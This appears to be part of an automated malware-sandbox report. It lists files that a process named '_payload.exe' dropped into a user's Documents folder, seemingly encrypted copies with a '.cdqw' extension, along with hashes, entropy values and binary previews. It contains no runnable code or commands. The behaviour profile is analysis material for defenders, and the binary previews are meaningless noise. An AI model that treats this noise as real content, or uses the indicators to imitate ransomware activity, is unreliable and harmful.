                                                                                                                                                                      Preview:ONBQC.J....6..g...^.l...k4.......=..1..d+2.,.!....*...+..,..P.K;X.....%30....s.CH.....])...N.?+......H...u.g...5,...1.....O...k.T.Q.c.....FMW..S........J0..%1_=......E\.W.I.L....d...?..Y/.......8..3{.zh.{s.:..$\..G..W..._9Y....XiF..Z..q.$....L.03...<x..].(.....>....e...D`..b"...lR..q+FO$s.....q.E9....@A../E...G.Q..E.5eLo..Y......_$.+......@..<m.YC.../..q.Q..4....X...@.4(......;X.E.`.@....H..7...\...E.?t.t+..N{Nx.0..x.hN.+1;.hs.]x...... >.W.m.0K&mAH-cd.IA.Zy!...&L.o.F.....{H.{......Q.....u.h.n.D.$.........}.qs....i..4.l.W.w.D..}........Q..hp.....q..`...1..Pri_....a...$.&...F@C....|..+I=\5..yoZ.F.....i.Aj...x<..R.]..t...Y..h...j...E|... z...V`......m..%..u.jo9......4....q!.q.....X~q....../.M.Tn...f.jI...cp..q9^....rmTu..._c.Y.....L..Z.".....flK...1i.........T.#..J.P.K.k...A~.p......bN.Z....../.\.......k.q...{/.d.V.f..N..3a...[T...'.ZWu.p....JS..gBl.jH.UY.}.P9.i..N.4C...X...Jnd...a>^..X.....D....Uj...7.]Crx...M8-I.N|....v$.q.%J.A.....I..Q.1].p...

                                                                                                                                                                      C:\Users\user\Documents\ONBQCLYSPU\ONBQCLYSPU.docx.cdqw (copy)

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                      Entropy (8bit):7.846410065412783
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:Er5/wuCk7Jl8MJvZWaXvsLCzFp7jiMAiSCnUZOO0G8z9K4tRZIiHMj2bD:Er54uJJuklkG/viMvQZ30lz9zRCiND
                                                                                                                                                                      MD5:EC1487DC2B47E2C2E48F9F14362B03D9
                                                                                                                                                                      SHA1:53099B9D10B98A41FA9D3A3125FD0ABD6DBB99AE
                                                                                                                                                                      SHA-256:29654CDE0A760C42A6D2FDF140EFF2AD5C2A64BFA94444211D3697A70650B1BF
                                                                                                                                                                      SHA-512:8D773F89B3E263E96BFED62C6FA82037F3C57611A4BF9F076352583F0A8A0DA599C609B1C6E839C9C3EC27A366B51BD2E6AD5864EC4A44DBDA43036D23E3C5D2
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:ONBQC.J....6..g...^.l...k4.......=..1..d+2.,.!....*...+..,..P.K;X.....%30....s.CH.....])...N.?+......H...u.g...5,...1.....O...k.T.Q.c.....FMW..S........J0..%1_=......E\.W.I.L....d...?..Y/.......8..3{.zh.{s.:..$\..G..W..._9Y....XiF..Z..q.$....L.03...<x..].(.....>....e...D`..b"...lR..q+FO$s.....q.E9....@A../E...G.Q..E.5eLo..Y......_$.+......@..<m.YC.../..q.Q..4....X...@.4(......;X.E.`.@....H..7...\...E.?t.t+..N{Nx.0..x.hN.+1;.hs.]x...... >.W.m.0K&mAH-cd.IA.Zy!...&L.o.F.....{H.{......Q.....u.h.n.D.$.........}.qs....i..4.l.W.w.D..}........Q..hp.....q..`...1..Pri_....a...$.&...F@C....|..+I=\5..yoZ.F.....i.Aj...x<..R.]..t...Y..h...j...E|... z...V`......m..%..u.jo9......4....q!.q.....X~q....../.M.Tn...f.jI...cp..q9^....rmTu..._c.Y.....L..Z.".....flK...1i.........T.#..J.P.K.k...A~.p......bN.Z....../.\.......k.q...{/.d.V.f..N..3a...[T...'.ZWu.p....JS..gBl.jH.UY.}.P9.i..N.4C...X...Jnd...a>^..X.....D....Uj...7.]Crx...M8-I.N|....v$.q.%J.A.....I..Q.1].p...

                                                                                                                                                                      C:\Users\user\Documents\ONBQCLYSPU\WUTJSCBCFX.png

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                      Entropy (8bit):7.851609618987647
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:9D5e5wbxF6TUeWJxXMMbaJxE73riM2t7TDdAUPCrGS3XNi90w91D6H1r6bktT2bD:QwbxQ4eWbM9JxE73+RhT/PUGDp1D6Vrs
                                                                                                                                                                      MD5:C34F0DEC61C2AD92A1CAE63B2D061AEA
                                                                                                                                                                      SHA1:7E6DD38D32A0488BDE1068760823306AE99E9471
                                                                                                                                                                      SHA-256:EE71666A8F8EE711BC9D8858F060B8ACC30C7EC15FF422FE0E24B76817E4B5D9
                                                                                                                                                                      SHA-512:86865B75BD0E9291EFB9E0D53DDF866A8BE26126FCCE5DEA1D57A6DA631115360A8A696E0BF56F708113DE25A2F425D6BB1E6513EF378153589E6083B7BC869A
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:WUTJSA.I.p..vp...j._a''..Z..o....t.oh.OT-U-..3./..i..L-..UQ...Yb..._K.@2....K...we...~<.........R......q.mrI...D.+. ..V>.a.z\.|Z..f.".P..<....!,.^.Q.$#..WL....dk@...tk..;.H2.....I..1CY.......8..`.z........s].M....#Ff.WmV&.k8...k..n,..d...t..x....CR...-=|...].5.q..\..k.b.C.f...n..L.j....,.J...6Tk..#....&.rd........d..^|.v...Lv..S...|........o2.J.......t.Z.N...>.zm....7.....!.y. ..>5...q...........p3$ .....).z..]Hhe..2.cf..jf..n?<J....{.,.....d...;.r..'.....e...>.mFDj....E.....U.} ..a.3.....3.F.............Q.tZ...._/..Q.[....Y....iV(..6B{.*...s.D..K)..7..z...qJ.8x..J.=ly.AD.X.X}s9f.H.N6..ep.....m..w.6..Bie....u(>|.w.u.]NO..W...|....@n..q.b.c..A.TL..#.............2;.........eOC....V"Z.....8^...'}.y.j.S..#..}-I!.c..jK@J.....Ezmw....&J....E..{..:.D.7...s..Bu..t..[G._s..B..}....+..C7....P. .%#.,.1...4U.;J........x..f..\.K....%h.]...wA..R#R.W.c...C<.8.w_@......H..&y?'._.....%..l....FU..`.0._%..%0.4[....,...=.1..B.!..8.S7...j.w@!........q...1....R

                                                                                                                                                                      C:\Users\user\Documents\ONBQCLYSPU\WUTJSCBCFX.png.cdqw (copy)

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                      Entropy (8bit):7.851609618987647
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:9D5e5wbxF6TUeWJxXMMbaJxE73riM2t7TDdAUPCrGS3XNi90w91D6H1r6bktT2bD:QwbxQ4eWbM9JxE73+RhT/PUGDp1D6Vrs
                                                                                                                                                                      MD5:C34F0DEC61C2AD92A1CAE63B2D061AEA
                                                                                                                                                                      SHA1:7E6DD38D32A0488BDE1068760823306AE99E9471
                                                                                                                                                                      SHA-256:EE71666A8F8EE711BC9D8858F060B8ACC30C7EC15FF422FE0E24B76817E4B5D9
                                                                                                                                                                      SHA-512:86865B75BD0E9291EFB9E0D53DDF866A8BE26126FCCE5DEA1D57A6DA631115360A8A696E0BF56F708113DE25A2F425D6BB1E6513EF378153589E6083B7BC869A
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:WUTJSA.I.p..vp...j._a''..Z..o....t.oh.OT-U-..3./..i..L-..UQ...Yb..._K.@2....K...we...~<.........R......q.mrI...D.+. ..V>.a.z\.|Z..f.".P..<....!,.^.Q.$#..WL....dk@...tk..;.H2.....I..1CY.......8..`.z........s].M....#Ff.WmV&.k8...k..n,..d...t..x....CR...-=|...].5.q..\..k.b.C.f...n..L.j....,.J...6Tk..#....&.rd........d..^|.v...Lv..S...|........o2.J.......t.Z.N...>.zm....7.....!.y. ..>5...q...........p3$ .....).z..]Hhe..2.cf..jf..n?<J....{.,.....d...;.r..'.....e...>.mFDj....E.....U.} ..a.3.....3.F.............Q.tZ...._/..Q.[....Y....iV(..6B{.*...s.D..K)..7..z...qJ.8x..J.=ly.AD.X.X}s9f.H.N6..ep.....m..w.6..Bie....u(>|.w.u.]NO..W...|....@n..q.b.c..A.TL..#.............2;.........eOC....V"Z.....8^...'}.y.j.S..#..}-I!.c..jK@J.....Ezmw....&J....E..{..:.D.7...s..Bu..t..[G._s..B..}....+..C7....P. .%#.,.1...4U.;J........x..f..\.K....%h.]...wA..R#R.W.c...C<.8.w_@......H..&y?'._.....%..l....FU..`.0._%..%0.4[....,...=.1..B.!..8.S7...j.w@!........q...1....R

                                                                                                                                                                      C:\Users\user\Documents\UMMBDNEQBN.xlsx

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                      Entropy (8bit):7.852299116063236
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:ybpvA9nFx3p//ldz9QVNv4wmiFrvYdNud8GTWb571Wmwndn63vpn3ACDqN/d5KIm:yVeFx3lINnmikPgvkJWmCd63V3TDq/ds
                                                                                                                                                                      MD5:0892CC4687D5194B81240D3ECC94DE36
                                                                                                                                                                      SHA1:67B9BD7F2FF4279CAAFA8C71A20578D1B9E5F136
                                                                                                                                                                      SHA-256:DD530F46E55FB05683FCF164BB298AE82E4E0975121925CEA527D5FF60F2DFD7
                                                                                                                                                                      SHA-512:CDFEBF259907375E08A66F719A2A9BEA49C4CB8D4F59CF76BB303EE15B206944003100A3DAB0F23791DEFC19C67CD6DE641471019E5D6FBA277868995D304B77
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:UMMBD..,..\...w.6&....-.:.....-@...q.X.(.3..*6...Lj.E......%..";.N.qFS..`..d....UD.u-ls..T.........k~o.........<.jX./n..C........[q. J...Tg.{.T...)..D..e.P....A.)..M)...]..TX(.Q..b.i[f...D.A.R;m.........Rt...s.c4...[...X..\S'Y.+.EXx....5ck^.....|*........Ig.....0q........oT.(.lSle.....H...{..74......y?_xW._.............)...h...?1....fI.]6KB.`...PM|........2..e...s...M..T..B..Z.....x..qO|U.=-*s.....Dn.F..$..n..)$.Un.(.Ft...g....E....A.u..0>..W^.{kv._..........P....W..e..c...h.x9.46.....u.j'...G.W.......\.-.ZS.W._.U.'..:.-...2y.v.7.5.....v......T.L..MQ..^ #..eR<..g.dhT.z..O.<.r7....Z.A..wbn5..=.R...B..Z..e.....=.$CQ...}P._.n$.0..........l.m.7J."......r.......d/.7.U.lB.....K..3.\...0Rc..z.........6...........G......j)Z.a.8.].....C+..|....).F..A....XA...g.Oh-....C...f.c"..~.+.9~hr...^.....<?...xE.....ge..G..rX..@... .j.u....X>....x}.t8..k..}..S.z....=j.h1......yP..\....x.>.....Q2.G.....Q..p.G.-?.n.u.........S;.N..n..-..hc.....{]...Z~oc.U......,..

                                                                                                                                                                      C:\Users\user\Documents\UMMBDNEQBN.xlsx.cdqw (copy)

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                      Entropy (8bit):7.852299116063236
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:ybpvA9nFx3p//ldz9QVNv4wmiFrvYdNud8GTWb571Wmwndn63vpn3ACDqN/d5KIm:yVeFx3lINnmikPgvkJWmCd63V3TDq/ds
                                                                                                                                                                      MD5:0892CC4687D5194B81240D3ECC94DE36
                                                                                                                                                                      SHA1:67B9BD7F2FF4279CAAFA8C71A20578D1B9E5F136
                                                                                                                                                                      SHA-256:DD530F46E55FB05683FCF164BB298AE82E4E0975121925CEA527D5FF60F2DFD7
                                                                                                                                                                      SHA-512:CDFEBF259907375E08A66F719A2A9BEA49C4CB8D4F59CF76BB303EE15B206944003100A3DAB0F23791DEFC19C67CD6DE641471019E5D6FBA277868995D304B77
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:UMMBD..,..\...w.6&....-.:.....-@...q.X.(.3..*6...Lj.E......%..";.N.qFS..`..d....UD.u-ls..T.........k~o.........<.jX./n..C........[q. J...Tg.{.T...)..D..e.P....A.)..M)...]..TX(.Q..b.i[f...D.A.R;m.........Rt...s.c4...[...X..\S'Y.+.EXx....5ck^.....|*........Ig.....0q........oT.(.lSle.....H...{..74......y?_xW._.............)...h...?1....fI.]6KB.`...PM|........2..e...s...M..T..B..Z.....x..qO|U.=-*s.....Dn.F..$..n..)$.Un.(.Ft...g....E....A.u..0>..W^.{kv._..........P....W..e..c...h.x9.46.....u.j'...G.W.......\.-.ZS.W._.U.'..:.-...2y.v.7.5.....v......T.L..MQ..^ #..eR<..g.dhT.z..O.<.r7....Z.A..wbn5..=.R...B..Z..e.....=.$CQ...}P._.n$.0..........l.m.7J."......r.......d/.7.U.lB.....K..3.\...0Rc..z.........6...........G......j)Z.a.8.].....C+..|....).F..A....XA...g.Oh-....C...f.c"..~.+.9~hr...^.....<?...xE.....ge..G..rX..@... .j.u....X>....x}.t8..k..}..S.z....=j.h1......yP..\....x.>.....Q2.G.....Q..p.G.-?.n.u.........S;.N..n..-..hc.....{]...Z~oc.U......,..

                                                                                                                                                                      C:\Users\user\Documents\UMMBDNEQBN\KZWFNRXYKI.pdf

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                      Entropy (8bit):7.8482034008638974
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:S7f7+p5/TtBDzCBGcs/cT5nUVEZ1BKdT3+xQj8QrWrlbQjSzQ/rLkiYptUVW2bD:Cfap7BDAGcsC5nUGZbC+GL0lPzYrLkDm
                                                                                                                                                                      MD5:62343229C6E618FAB00AF6EA662929B4
                                                                                                                                                                      SHA1:D609D0B10594123B605A299DCE3343AAC7AC320F
                                                                                                                                                                      SHA-256:447B814BACA4AE7B31BDBF070AE0AD64D8F720C95D8C12AAD22509FABA24EED8
                                                                                                                                                                      SHA-512:BC43B92DD88A1AAFAAAF8C39B14F79630B7939CF837DF2C91CA7B60C636A1641DBE716BCD0B220E0CA80A917222E09DFE551A759C691F5F288884CBBC43CE810
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:KZWFNJhm3"YI...y.j..(o...R....5..e..G.k.P.......*...........A..$.q.^f7...Y.I.+A..5."....q...B'g..XQ.-.I...=0.>.J......%..8p.....n...{c..~.h.%V.h.....<...Ef..&.....g.*F ....0..;x..V.f7...[...Jt.L.gs..1..A...{.c......J..&.Y'{/...q...)..?.=......s...Y..../.QQ[..|..a}^..5.y..IV..Y!.........m.N....}...<KO..9"...@xn..........v.)...x>.$..%,.hT...o...]Z..8...}.?.-.z..y.5XP.S.w.....*W..^J=^]..9..=(<x.=.c....^w......+q$..=T......R...8@hf7..n......bn..i..x..5...#'..E.'..}.r..g..............}.N.u7..Y....;.H>.1oN.G^.Z:t..'(.y.&....[..aAN../...!.p.C..isr..Y.....*.\(...i!...wq..wA..b 6................*.S...$].......Pg2.=.B.p.(....Kb.?2o..2.+:A...O.7.&D.f..VvmlJ$..]..LO.X.W.-t.$.$FX2..-...8.v...[?.L..y.2......y..i..n.....@.c..)./:Z.Y...+.........q........o..rE.d...2...0{....l{.......h.QH.Kg^.M....`.x[..1>>../...u(...t..$..D....X....i'?0.?...,a)........zp..gv..3<T.$..Fuf.6.*d...6....,6s\.<\.3.6/L...m.r..vv._..r...3t..A..%....6..4...A.G...%...._...J.0`......^...7u

                                                                                                                                                                      C:\Users\user\Documents\UMMBDNEQBN\KZWFNRXYKI.pdf.cdqw (copy)

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                      Entropy (8bit):7.8482034008638974
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:S7f7+p5/TtBDzCBGcs/cT5nUVEZ1BKdT3+xQj8QrWrlbQjSzQ/rLkiYptUVW2bD:Cfap7BDAGcsC5nUGZbC+GL0lPzYrLkDm
                                                                                                                                                                      MD5:62343229C6E618FAB00AF6EA662929B4
                                                                                                                                                                      SHA1:D609D0B10594123B605A299DCE3343AAC7AC320F
                                                                                                                                                                      SHA-256:447B814BACA4AE7B31BDBF070AE0AD64D8F720C95D8C12AAD22509FABA24EED8
                                                                                                                                                                      SHA-512:BC43B92DD88A1AAFAAAF8C39B14F79630B7939CF837DF2C91CA7B60C636A1641DBE716BCD0B220E0CA80A917222E09DFE551A759C691F5F288884CBBC43CE810
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:KZWFNJhm3"YI...y.j..(o...R....5..e..G.k.P.......*...........A..$.q.^f7...Y.I.+A..5."....q...B'g..XQ.-.I...=0.>.J......%..8p.....n...{c..~.h.%V.h.....<...Ef..&.....g.*F ....0..;x..V.f7...[...Jt.L.gs..1..A...{.c......J..&.Y'{/...q...)..?.=......s...Y..../.QQ[..|..a}^..5.y..IV..Y!.........m.N....}...<KO..9"...@xn..........v.)...x>.$..%,.hT...o...]Z..8...}.?.-.z..y.5XP.S.w.....*W..^J=^]..9..=(<x.=.c....^w......+q$..=T......R...8@hf7..n......bn..i..x..5...#'..E.'..}.r..g..............}.N.u7..Y....;.H>.1oN.G^.Z:t..'(.y.&....[..aAN../...!.p.C..isr..Y.....*.\(...i!...wq..wA..b 6................*.S...$].......Pg2.=.B.p.(....Kb.?2o..2.+:A...O.7.&D.f..VvmlJ$..]..LO.X.W.-t.$.$FX2..-...8.v...[?.L..y.2......y..i..n.....@.c..)./:Z.Y...+.........q........o..rE.d...2...0{....l{.......h.QH.Kg^.M....`.x[..1>>../...u(...t..$..D....X....i'?0.?...,a)........zp..gv..3<T.$..Fuf.6.*d...6....,6s\.<\.3.6/L...m.r..vv._..r...3t..A..%....6..4...A.G...%...._...J.0`......^...7u

                                                                                                                                                                      C:\Users\user\Documents\UMMBDNEQBN\UMMBDNEQBN.docx

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                      Entropy (8bit):7.849750646577322
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:r7n7FCsEqJVodpesdu+GgajO62ruit2JH473C+DBRzvN8Tzh98XgBY8b2bD:nBUnNdjw662iit2S7tVZveTzagBmD
                                                                                                                                                                      MD5:2B09A932B34990FF5B889CD5C66EB9B6
                                                                                                                                                                      SHA1:6BC32A6A53900CAD9CD7BFD8128159FE29E2694C
                                                                                                                                                                      SHA-256:BC30A6792249E02CFB26EBF7802025C63559850D3A092DA37408AE1CBE670F29
                                                                                                                                                                      SHA-512:734DCF43EB05E8BCD5596668AD301E3D8F540E01870131F70F21813C7654B3AAD040754F07DD490508A018040E8D3BAB84D5AB64B8FC738E7AA86E4F4479251E
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:UMMBD..pN.\`W..q.6f.N..f........C........0T.....m..O/{.~d.=H..s,....=h...Q..o......=.a..........I!"..m.o.q..x..v...^t.8D...(..U...c<9.R.....w1q...a:..'^,..v.?b..&.D.......m.......>........Xy.0mBPfDl.8....m...!s.....8n..2.bu.z.G.r...&..l....5K.E.f.1.5.R.T\P..="kQ...i4W.=..e......L.g....qK..-A/....=.wpT\bU.....=....Ba.....$.g...-..L.R.#VU...1...u.......2.=_.!..u..6...7|.7..M.I#....z....N...m..x.>x'.RM.q....)Q..e.1.g......~...M......s..U). ..>,....I.........;.m.;?...U.&..}.4q$2.2<..D..Sb.........}kE....}f..]..g.1)|...j..kK.& x.P%.0ld+..B..7D...e..r..}./A.g$.J:.Tl....xt.BK..k+3F.A.3.DS.U..Rq].3.....5..O...Ay....H..b$...-.`.UD[@O+.8f.~.....HA........)T~)XY.A8..n.....-q&.....ny$...-yD..Ik..>...........="Qp....u.4..F ..v..a..T.]p%.....,.T.[.......E.6..xs..w.].^...d..QqvH~.._..2.:..6...qwd.e..v.{G..U.....3w..O....x.*Y........(...P...r.4...2_?....K8.l.....r....z.....[X.6B...2...X..:.z...%.!.g..P.dO.].h.A...Pp...`..0fD.....p....{..5.b_.n

                                                                                                                                                                      C:\Users\user\Documents\UMMBDNEQBN\UMMBDNEQBN.docx.cdqw (copy)

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                      Entropy (8bit):7.849750646577322
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:r7n7FCsEqJVodpesdu+GgajO62ruit2JH473C+DBRzvN8Tzh98XgBY8b2bD:nBUnNdjw662iit2S7tVZveTzagBmD
                                                                                                                                                                      MD5:2B09A932B34990FF5B889CD5C66EB9B6
                                                                                                                                                                      SHA1:6BC32A6A53900CAD9CD7BFD8128159FE29E2694C
                                                                                                                                                                      SHA-256:BC30A6792249E02CFB26EBF7802025C63559850D3A092DA37408AE1CBE670F29
                                                                                                                                                                      SHA-512:734DCF43EB05E8BCD5596668AD301E3D8F540E01870131F70F21813C7654B3AAD040754F07DD490508A018040E8D3BAB84D5AB64B8FC738E7AA86E4F4479251E
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:UMMBD..pN.\`W..q.6f.N..f........C........0T.....m..O/{.~d.=H..s,....=h...Q..o......=.a..........I!"..m.o.q..x..v...^t.8D...(..U...c<9.R.....w1q...a:..'^,..v.?b..&.D.......m.......>........Xy.0mBPfDl.8....m...!s.....8n..2.bu.z.G.r...&..l....5K.E.f.1.5.R.T\P..="kQ...i4W.=..e......L.g....qK..-A/....=.wpT\bU.....=....Ba.....$.g...-..L.R.#VU...1...u.......2.=_.!..u..6...7|.7..M.I#....z....N...m..x.>x'.RM.q....)Q..e.1.g......~...M......s..U). ..>,....I.........;.m.;?...U.&..}.4q$2.2<..D..Sb.........}kE....}f..]..g.1)|...j..kK.& x.P%.0ld+..B..7D...e..r..}./A.g$.J:.Tl....xt.BK..k+3F.A.3.DS.U..Rq].3.....5..O...Ay....H..b$...-.`.UD[@O+.8f.~.....HA........)T~)XY.A8..n.....-q&.....ny$...-yD..Ik..>...........="Qp....u.4..F ..v..a..T.]p%.....,.T.[.......E.6..xs..w.].^...d..QqvH~.._..2.:..6...qwd.e..v.{G..U.....3w..O....x.*Y........(...P...r.4...2_?....K8.l.....r....z.....[X.6B...2...X..:.z...%.!.g..P.dO.].h.A...Pp...`..0fD.....p....{..5.b_.n

                                                                                                                                                                      C:\Users\user\Documents\UMMBDNEQBN\WKXEWIOTXI.png

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                      Entropy (8bit):7.852879661145449
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:rnk+haFRx74kGTDFs3JmOLW6szyW0c0mj7o5ukO6Hm3rNoMdjMGW0Q7cSX+GT2bD:rn8Oxs3JmwiyWn05uzam36MdjMkuupD
                                                                                                                                                                      MD5:F1B68801FD4CE81AA2CDDB3E1E4EB9EE
                                                                                                                                                                      SHA1:B07D74113D60A5E8580ECC8B6F31BC320116B6D0
                                                                                                                                                                      SHA-256:539E12097FE7394AA5630178A3D276C75C02D2FA26334858EECBCC733F3418E6
                                                                                                                                                                      SHA-512:48CCB8EEFF46D832BB5C15A58B09AA02B705EC9DEAC74CC48E262B106C9E81EBB13B65CBDE27E8E5B7A0B6C483EE0082638A5F3A49DBD647F4A3146D2E6C0AE7
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:WKXEW..0.h~``.)MG.D.........-....L..p.51....ik...YD.......-a..Q.H..6%P.>}z.$..H..+..2A.....S...........k+.u.@z`.g...5.......z..}.U.9......4..S.1M*..F..V..%...I;.....M.g....FM-.y.v..4.X([....UY...v..=L.h.X.].)Tw[.0B...j...hLfO.4./....T...e......t>jk..\w..("...#...6k.....[I5..&.W.u.._.FD;M||.p.&..>.$X....-ob..+...0...H.-..N...P..=.M....Hu_Dl.PP.Hg.....S.L... .f..Nw.iNB.BG.x..Qk,...H.8...D#...3.@.....f...`.!c.._a-4......iG...pO.i<.\.3.b...m#...b....Q$.....-.P}....%,../@....*Uww..U.....6{.y*.T.....r.5.."..J...B.{.l.......b..}yD.K......^.+.Z"Z...f......i.... .......&..( 6u.7/..5.+&n..}u.D..........v..P.=.!.&. ..R...u.tP.\.H..i...d.z.\...r..".a.l..ku.......s Rr....A..w......j2..Y..P/.7xKb..L..q....^.....J.b...`....<%n&.4.k.......R..H....NB..Z .Y...h.,QW;.Ag6.}.Y.....3.>.Of..K..t....`...x.V....SJ.h...e.z..c...+.....;{...>.4.:."h....E~.I\.NS.J}.p=_..bv+........=Q ...H..a...A...*......y....@..x_.5.Xnx..J....A.....xKB....J...f.|m.=..t....Q

                                                                                                                                                                      C:\Users\user\Documents\UMMBDNEQBN\WKXEWIOTXI.png.cdqw (copy)

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                      Entropy (8bit):7.852879661145449
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:rnk+haFRx74kGTDFs3JmOLW6szyW0c0mj7o5ukO6Hm3rNoMdjMGW0Q7cSX+GT2bD:rn8Oxs3JmwiyWn05uzam36MdjMkuupD
                                                                                                                                                                      MD5:F1B68801FD4CE81AA2CDDB3E1E4EB9EE
                                                                                                                                                                      SHA1:B07D74113D60A5E8580ECC8B6F31BC320116B6D0
                                                                                                                                                                      SHA-256:539E12097FE7394AA5630178A3D276C75C02D2FA26334858EECBCC733F3418E6
                                                                                                                                                                      SHA-512:48CCB8EEFF46D832BB5C15A58B09AA02B705EC9DEAC74CC48E262B106C9E81EBB13B65CBDE27E8E5B7A0B6C483EE0082638A5F3A49DBD647F4A3146D2E6C0AE7
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:WKXEW..0.h~``.)MG.D.........-....L..p.51....ik...YD.......-a..Q.H..6%P.>}z.$..H..+..2A.....S...........k+.u.@z`.g...5.......z..}.U.9......4..S.1M*..F..V..%...I;.....M.g....FM-.y.v..4.X([....UY...v..=L.h.X.].)Tw[.0B...j...hLfO.4./....T...e......t>jk..\w..("...#...6k.....[I5..&.W.u.._.FD;M||.p.&..>.$X....-ob..+...0...H.-..N...P..=.M....Hu_Dl.PP.Hg.....S.L... .f..Nw.iNB.BG.x..Qk,...H.8...D#...3.@.....f...`.!c.._a-4......iG...pO.i<.\.3.b...m#...b....Q$.....-.P}....%,../@....*Uww..U.....6{.y*.T.....r.5.."..J...B.{.l.......b..}yD.K......^.+.Z"Z...f......i.... .......&..( 6u.7/..5.+&n..}u.D..........v..P.=.!.&. ..R...u.tP.\.H..i...d.z.\...r..".a.l..ku.......s Rr....A..w......j2..Y..P/.7xKb..L..q....^.....J.b...`....<%n&.4.k.......R..H....NB..Z .Y...h.,QW;.Ag6.}.Y.....3.>.Of..K..t....`...x.V....SJ.h...e.z..c...+.....;{...>.4.:."h....E~.I\.NS.J}.p=_..bv+........=Q ...H..a...A...*......y....@..x_.5.Xnx..J....A.....xKB....J...f.|m.=..t....Q

                                                                                                                                                                      C:\Users\user\Documents\VLZDGUKUTZ.pdf

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
